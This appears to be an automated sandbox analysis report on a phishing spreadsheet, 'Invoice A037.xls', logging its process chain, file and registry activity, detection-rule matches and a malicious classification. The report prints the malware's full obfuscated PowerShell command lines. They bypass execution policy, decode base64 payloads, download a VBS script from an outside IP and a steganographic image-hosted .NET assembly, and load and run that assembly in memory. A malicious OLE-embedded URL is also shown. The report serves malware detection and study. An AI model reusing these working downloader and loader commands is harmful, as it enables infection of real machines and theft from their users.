            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE89A7352E8_2_000007FE89A7352E
            Source: Invoice A037.xlsOLE indicator, VBA macros: true
            Source: CA430000.0.drOLE indicator, VBA macros: true
            Source: Invoice A037.xlsStream path 'MBD00090643/\x1Ole' : https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa]5142&=AJn)=3bEV;z# iMm0:[?v1J82h0O;+%\o:=uATb&?awS'Qc)U_1(!J)`qm*|Cp26tn64$[W6hY$6;WYPmLOdpKueQL46CJ2pRAne90bKAIR7qhLL4siiVJ4fcfuzw8863WrInQRLpbD6VocSl0qdqVrm8PHK3txGQnYxj5WrnOXQwXUfsdMijy3PZOs2IKsdy4BSehCpXFjrFnFYO3h5i0OtUnVnvC5v9mO7snTFk9H1o4tqK0dYmWCyUPKvi0frPry55t6JuQypi5NQVT9QSRiHBEuLqSGQ:ltYUN#SYSiDre
            Source: CA430000.0.drStream path 'MBD00090643/\x1Ole' : https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa]5142&=AJn)=3bEV;z# iMm0:[?v1J82h0O;+%\o:=uATb&?awS'Qc)U_1(!J)`qm*|Cp26tn64$[W6hY$6;WYPmLOdpKueQL46CJ2pRAne90bKAIR7qhLL4siiVJ4fcfuzw8863WrInQRLpbD6VocSl0qdqVrm8PHK3txGQnYxj5WrnOXQwXUfsdMijy3PZOs2IKsdy4BSehCpXFjrFnFYO3h5i0OtUnVnvC5v9mO7snTFk9H1o4tqK0dYmWCyUPKvi0frPry55t6JuQypi5NQVT9QSRiHBEuLqSGQ:ltYUN#SYSiDre
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2077
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2044
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2424
            Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2077
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2044
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2424
            Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2077Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2044Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2424Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2077
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2044
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2424
            Source: Process Memory Space: powershell.exe PID: 2580, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3912, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.spre.phis.troj.expl.evad.winXLS@38/53@27/5
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\CA430000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR9B25.tmpJump to behavior
            Source: Invoice A037.xlsOLE indicator, Workbook stream: true
            Source: CA430000.0.drOLE indicator, Workbook stream: true
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..............P................m.......m.....}..w.............................1......(.P..............3........!...............g.............Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................7.@k....}..w......g.....\.......................(.P.....X.......`.......................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.......................................g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.........!.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................7.@k....}..w......g.....\.......................(.P.....X.......`.......................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.......................................g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.........!.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8<p.......@k....8.o.....(.P.....X.......`............... .......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.......................................g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.........!.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.X.......`...............@.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.......................................g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.........!.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.......................................g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.........!.....l.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .........g.....}..w............8<p.......@k....8.o.....(.P.....X.......`.......................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................g.............0.QT.....Wl.....}..w............@E......^...............(.P.....X.......`.......................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................g......................Wl.....}..w............@E......^...............(.P.....X.......`.......................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...T.......y...............D.......y.......y...............D......3D.......2...............y.............Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(D.......................T.....}..w......T.......D.......D......1D.....(.P.......................2.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................y.....}..w............8.D.....8.D.....@"D.....(.P.....................................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................2.......|k....}..w......y.....\.F.......D.............(.P.......................2.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'.".|k.....&U.....(.P.....................H.2.....*.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................2.......|k....}..w......y.....\.F.......D.............(.P.......................2.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.1.6.0.....|k.....&U.....(.P.....................H.2.....&.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................y.....}..w..............A.......|k.....&U.....(.P.....................................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................y.....}..w..............A.......|k.....&U.....(.P.....................................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................y.....}..w..............A.......|k.....&U.....(.P.....................................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................y.....}..w..............A.......|k.....&U.....(.P.............................T.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .........y.....}..w..............A.......|k.....&U.....(.P.....................H.2.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................T.......T.....}..w..............D.......D......1D.....(.P.......D......3D.....................@@..............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................9.l....}..w....@@......\.F.......D.............(.P.....................................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@@......}..w............8.m......9.l............(.P.....................................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................9.l....}..w....@@......\.F.......D.............(.P.....................................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@@......}..w............8.m......9.l............(.P.....................................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8.m......9.l............(.P............................. .......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@@......}..w............8.m......9.l............(.P.....................................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@@......}..w............8.m......9.l............(.P.....................................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@@......}..w............8.m......9.l............(.P.............................l.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@@......}..w............8.m......9.l............(.P.....................................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................@@..............0.py.....WS.....}..w............@EE.....^...............(.P.....................8...............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................@@.......................WS.....}..w............@EE.....^...............(.P.....................8...............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...T.......................D...............................D......3D.....................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(D.......................T.....}..w......T.......D.......D......1D.....(.P.....h.......P.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............8.D.....8.D.....@"D.....(.P.....h.......P.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................9sOk....}..w............\.F.......D.............(.P.....h.......P.......(...............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'.".Ok..... _.....(.P.....h.......P...............*.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................9sOk....}..w............\.F.......D.............(.P.....h.......P.......(...............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.1.6.0....pOk..... _.....(.P.....h.......P...............&.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............K......pOk..... _.....(.P.....h.......P.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............K......pOk..... _.....(.P.....h.......P.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............K......pOk..... _.....(.P.....h.......P.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............K......pOk..... _.....(.P.....h.......P...............T.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w..............K......pOk..... _.....(.P.....h.......P.......................................
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: Invoice A037.xlsVirustotal: Detection: 19%
            Source: Invoice A037.xlsReversingLabs: Detection: 21%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzL